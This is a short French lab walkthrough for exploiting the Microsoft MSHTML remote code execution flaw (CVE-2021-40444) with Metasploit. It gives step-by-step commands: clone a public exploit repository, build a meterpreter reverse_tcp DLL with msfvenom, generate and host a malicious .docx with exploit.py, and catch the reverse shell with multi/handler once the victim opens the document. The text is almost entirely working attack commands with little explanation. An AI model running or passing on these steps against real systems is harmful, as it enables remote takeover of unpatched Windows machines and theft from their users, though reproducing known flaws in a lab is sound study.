
Tentative de reproduction de la vulnérabilité Microsoft MSHTML Remote Code Execution (RCE) à l'aide de Metasploit Framework.
Une tentative de reproduction de la vulnérabilité d'exécution de code à distance (RCE) Microsoft MSHTML en utilisant Metasploit Framework.
Fonctionne mieux si elle n'est pas exécutée dans FlareVM
Clonez le dépôt depuis https://github.com/lockedbyte/CVE-2021-40444
Préparez le modèle .dll à utiliser plus tard avec msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll
Copiez le template.dll récemment produit dans le dossier test/ du dépôt
Donnez la permission d'exécution au template.dll par chmod +x template.dll
Exécutez le script pour utiliser le template.dll et le transformer en output
python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>
Le document sera ensuite exporté dans le dossier out/ et nous pouvons configurer un écouteur sur notre port HTTP (par défaut 80)
python3 exploit.py host 80
Lancez metasploit avec
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <SOURCE IP>
run
Ensuite, nous pouvons envoyer le document.docx à notre machine vulnérable et exécuter le .docx
Nous obtiendrons une réponse dans le terminal de exploit.py et le laboratoire est réussi si nous parvenons à générer un shell reverse tcp.